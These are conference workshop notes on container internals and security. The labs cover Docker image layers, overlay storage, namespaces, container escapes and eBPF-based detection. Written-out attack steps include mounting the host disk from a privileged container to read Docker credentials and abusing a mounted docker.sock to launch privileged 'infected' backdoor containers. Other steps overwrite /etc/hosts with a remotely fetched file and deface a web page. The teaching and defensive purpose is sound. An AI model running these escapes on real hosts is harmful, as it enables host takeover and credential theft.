# 19-10-2023 Annacon

## Dissecting container and pods

You can find the recording (in Dutch) and slides over here at <https://annacon.be/0x7e7_media/>

### Running containers is easy

#### Docker host

* Ubuntu machine
* public IP address
* security group allowing inbound TCP 80, 443, 8080 and 8081

#### Install docker

```
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh ./get-docker.sh
```

```
sudo groupadd docker
sudo usermod -aG docker $USER
newgrp docker
```

#### Running our first container

```
# public IP address of the Docker host (placeholder: fill in your own)
export IP="x.x.x.x"
```

```
docker run -d -p 8080:80 --name www nginx:1.24
```

```
docker run -d -p 8081:80 --name www2 nginx:1.25
```

```
curl -kv $IP:8080
```

```
curl -kv $IP:8081
```

#### Creating our first image

```
mkdir ./lab1
cd lab1
```

```
echo "My Annacon secret" >./secret.txt
```

```
cat >Dockerfile <<EOF
FROM ubuntu:20.04
ADD ./secret.txt /secret.txt
RUN apt-get update && apt-get install -y curl netcat
# deleting the file only adds a whiteout in a new layer; the ADD layer above still contains it
RUN rm -f /secret.txt
CMD bash
EOF
```

```
docker build -t myimage .
```

```
docker run -it myimage
```

```
docker tag myimage xxradar/myimage:01
```

```
docker login
```

```
docker push xxradar/myimage:01
```

```
docker run -it xxradar/myimage:01
```

### Dissecting the image

```
mkdir ../lab2
cd ../lab2
```

```
docker save xxradar/myimage:01 >image.tar
```

```
tar xfv ./image.tar
```

```
jq -r . manifest.json
```

#### Finding `secret.txt`

Explore the layer directories and untar every layer: `secret.txt` is still present in the layer created by the `ADD` step, and the `RUN rm` step only adds a whiteout (`.wh.secret.txt`) on top of it.

```
# each layer lives in <layer-id>/layer.tar; extract every one in place
for l in */layer.tar; do tar -xvf "$l" -C "$(dirname "$l")"; done
```
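Added example, not part of the workshop material: a small script that walks a `docker save` tarball in manifest order and reports, for a file name, which layer adds it (and its contents) and which layer whites it out. `sample_image()` builds a constructed stand-in for the lab image so the script runs offline; on a real host point it at the `image.tar` produced above.

```python
import io, json, sys, tarfile

WHITEOUT = ".wh."  # prefix a layer uses to record that a lower-layer file was deleted

def tar_bytes(files):
    """Build an uncompressed tar in memory from {path: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as t:
        for path, data in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            t.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def find_in_image(image_tar, name):
    """Walk the layers of a `docker save` tarball in manifest order and report
    each layer that adds `name` (with its bytes) or whites it out (the rm step)."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(image_tar)) as img:
        manifest = json.load(img.extractfile("manifest.json"))
        for entry in manifest:
            for idx, layer_path in enumerate(entry["Layers"]):
                raw = img.extractfile(layer_path).read()
                with tarfile.open(fileobj=io.BytesIO(raw)) as layer:
                    for m in layer.getmembers():
                        base = m.name.rsplit("/", 1)[-1]
                        if base == name and m.isfile():
                            hits.append((idx, layer_path, "present",
                                         layer.extractfile(m).read()))
                        elif base == WHITEOUT + name:
                            hits.append((idx, layer_path, "whiteout", None))
    return hits

def sample_image():
    """Constructed stand-in for the lab image (not real `docker save` output):
    layer 0 is the ADD step, layer 1 is the `RUN rm -f /secret.txt` step."""
    layers = {
        "aaa/layer.tar": tar_bytes({"secret.txt": b"My Annacon secret\n"}),
        "bbb/layer.tar": tar_bytes({".wh.secret.txt": b"", "usr/bin/curl": b"\x7fELF"}),
    }
    manifest = [{"Config": "cfg.json", "RepoTags": ["xxradar/myimage:01"],
                 "Layers": list(layers)}]
    return tar_bytes({**layers, "manifest.json": json.dumps(manifest).encode()})

if __name__ == "__main__":
    # usage: python3 find_in_layers.py image.tar secret.txt
    with open(sys.argv[1], "rb") as f:
        for idx, path, state, data in find_in_image(f.read(), sys.argv[2]):
            print(f"layer {idx} ({path}): {state} {data or b''!r}")
```

The same walk works for the OCI-style layout newer Docker versions write, because it only relies on the `Layers` list in `manifest.json` and on each layer being an uncompressed tar.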

### Dissecting a running container

```
mkdir ../lab3
cd ../lab3
```

```
docker inspect www
```

#### Storage

```
docker inspect www | jq -r '.[].LogPath'
```

```
docker inspect www | jq -r '.[].GraphDriver'
```

```
sudo ls /var/lib/docker/overlay2/dbe8c23813804c767695f142a99d5f1669552b853c989f9ef6182cbd87efe802/diff
```

```
docker exec -it www bash
```

```
# inside the container: write a file into the container's writable layer
echo secretoftheday >text.txt
```

```
# back on the host: the new file shows up in the upper (diff) directory of the overlay
sudo ls /var/lib/docker/overlay2/dbe8c23813804c767695f142a99d5f1669552b853c989f9ef6182cbd87efe802/diff
```

```
sudo cat /var/lib/docker/overlay2/dbe8c23813804c767695f142a99d5f1669552b853c989f9ef6182cbd87efe802/diff/text.txt
```

#### Processes and namespaces

```
mkdir ../lab4
cd ../lab4
```

```
# PID of the container's init process as seen from the host
export PID=$(docker inspect www | jq -r '.[].State.Pid')
echo $PID
```

```
# show the namespace ids of every process and pick out the container's one
sudo ps -eo pid,netns,utsns,ipcns,mntns,pidns,cmd | grep $PID
```

```
# net namespace id copied from the netns column of the previous output
export NETNS="4026532287"
```

```
# every process that shares that network namespace
sudo ps -eo pid,netns,utsns,ipcns,mntns,pidns,cmd | grep $NETNS
```

#### Entering a container

```
# enter all namespaces of the container's init process (needs root)
sudo nsenter -t $PID -a
```

```
apt-get update && apt-get install -y procps
```

```
ps aux
```

```
curl https://www.radarhack.com/dir/demo/hosts.txt -o /etc/hosts
```

```
curl www.google.com
```

```
cat /usr/share/nginx/html/index.html
```

```
echo hacking at annacon >> /usr/share/nginx/html/index.html
```

#### Privileged

```
docker run -d --privileged --name www3 nginx:1.25
```
```

```
docker exec -it www3 bash
```

```
mkdir /tmp/host-fs
mount /dev/root /tmp/host-fs/
```

```
cd /tmp/host-fs/
cat /tmp/host-fs/home/ubuntu/.docker/config.json
```

#### Mounting issues

```
docker run -d -v /var/run/docker.sock:/var/run/docker.sock --name www4 nginx:1.25
```
```

```
docker exec -it www4 bash
```

```
# fetch a static docker CLI inside the container and talk to the host daemon over the mounted socket
curl https://download.docker.com/linux/static/stable/x86_64/docker-24.0.6.tgz -O
tar xzvf ./docker-24.0.6.tgz
cd docker
./docker -H unix:///var/run/docker.sock ps
./docker -H unix:///var/run/docker.sock run -d --name hackpod xxradar/hackon sleep 900
./docker -H unix:///var/run/docker.sock run -d --privileged --name hackpodpriv xxradar/ubuntu_infected:annacon sleep 500
./docker -H unix:///var/run/docker.sock run -d --privileged -v /var/run/docker.sock:/var/run/docker.sock --name hackpod_backdoor xxradar/ubuntu_infected:annacon bash -c "sleep 500"
```

```
apt list
```
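Added example, not part of the workshop material: a small audit over `docker inspect` output that flags the settings the Privileged and Mounting issues sections rely on (`--privileged`, `--pid=host`, `--cgroupns=host`, a bind mount of `docker.sock`), so a defender can find such containers on a host. Field names follow the Docker inspect JSON (`HostConfig.Privileged`, `HostConfig.PidMode`, `HostConfig.CgroupnsMode`, `Mounts[].Source`); `SAMPLE` is constructed, and `audit_host` assumes a `docker` CLI on PATH.

```python
import json, subprocess

DOCKER_SOCK = "/var/run/docker.sock"

def audit_container(info):
    """Findings for one element of `docker inspect` output, covering the settings
    abused in the lab: --privileged, --pid=host, --cgroupns=host, docker.sock mounts."""
    hc = info.get("HostConfig") or {}
    findings = []
    if hc.get("Privileged"):
        findings.append("privileged: all capabilities and host devices, host root fs is mountable")
    if hc.get("PidMode") == "host":
        findings.append("pid=host: every host process is visible and reachable with nsenter")
    if hc.get("CgroupnsMode") == "host":
        findings.append("cgroupns=host: host cgroup hierarchy is exposed")
    for m in info.get("Mounts") or []:
        if (m.get("Source") or "").rstrip("/") == DOCKER_SOCK:
            findings.append("docker.sock mounted: container can drive the Docker daemon")
    return findings

def audit_all(inspect_output):
    """Map container name -> findings for the JSON list that `docker inspect` prints."""
    return {c["Name"].lstrip("/"): audit_container(c) for c in json.loads(inspect_output)}

# Constructed sample shaped like the lab containers; not real `docker inspect` output.
SAMPLE = json.dumps([
    {"Name": "/www", "HostConfig": {"Privileged": False, "PidMode": ""}, "Mounts": []},
    {"Name": "/www3", "HostConfig": {"Privileged": True, "PidMode": ""}, "Mounts": []},
    {"Name": "/www4", "HostConfig": {"Privileged": False, "PidMode": ""},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock", "RW": True}]},
    {"Name": "/tracee", "HostConfig": {"Privileged": True, "PidMode": "host",
                                       "CgroupnsMode": "host"}, "Mounts": []},
])

def audit_host():
    """Run the audit against every running container on this Docker host."""
    ids = subprocess.run(["docker", "ps", "-q"], capture_output=True,
                         text=True, check=True).stdout.split()
    if not ids:
        return {}
    out = subprocess.run(["docker", "inspect", *ids], capture_output=True,
                         text=True, check=True).stdout
    return audit_all(out)

if __name__ == "__main__":
    for name, findings in audit_host().items():
        print(name, "->", "; ".join(findings) or "no risky settings")
```

The Tracee and Tetragon containers in the eBPF section below run with exactly these settings by design, so expect them to be flagged and allow-list them explicitly rather than loosening the checks.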

### eBPF

#### Tracee

```
docker run --name tracee --rm -it \
   --pid=host \
   --cgroupns=host \
   --privileged \
   -v /etc/os-release:/etc/os-release-host:ro \
   aquasec/tracee:latest
```

#### Falco

```
curl -s https://falco.org/repo/falcosecurity-packages.asc | sudo apt-key add -
echo "deb https://download.falco.org/packages/deb stable main" | sudo tee -a /etc/apt/sources.list.d/falcosecurity.list
sudo apt-get update -y
sudo apt-get install -y falco
```

```
- rule: spawned_process_in_test_container
  desc: A process was spawned in the test container.
  condition: container.name = "falco-test" and evt.type = execve
  output: "%evt.time,%user.uid,%proc.name,%container.id,%container.name,command=%proc.cmdline"
  priority: WARNING
```

```
sudo falco -r ./falco.rule
...
```

#### Tetragon

```
docker run -d --name tetragon-container --rm --pull always \
    --pid=host \
    --cgroupns=host \
    --privileged \
    -v /sys/kernel/btf/vmlinux:/var/lib/tetragon/btf \
    quay.io/cilium/tetragon-ci:latest
```

```
docker exec tetragon-container tetra getevents -o compact
```

```
root@ip-172-31-31-30:~# cat ./tracing_policy.yaml
# This tracing policy 'connect-only-local-addrs' will report attempts
# to make outbound TCP connections to any IP address other than those
# within the 127.0.0.0/8 CIDR, from the binary /usr/bin/curl. In
# addition it will also kill the offending curl process.
#
# Description:
#  Report and block outbound TCP connections outside loopback from
#  /usr/bin/curl.
#
# In production, this could be used to force processes to only connect
# to their side cars on their local loopback, and to treat transgressions
# as evidence of malicious activity, resulting in the process being
# killed.

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "connect-only-local-addrs"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchArgs:
      - index: 0
        operator: "NotDAddr"
        values:
        - "127.0.0.0/8"
      matchBinaries:
      - operator: "In"
        values:
        - "/usr/bin/curl"
      matchActions:
      - action: Sigkill
```

```
docker run -d --name tetragon-container --rm --pull always \
    --pid=host --cgroupns=host --privileged \
    -v $PWD/tracing_policy.yaml:/tracing_policy.yaml \
    -v /sys/kernel/btf/vmlinux:/var/lib/tetragon/btf \
    quay.io/cilium/tetragon-ci:latest \
    --tracing-policy /tracing_policy.yaml
```
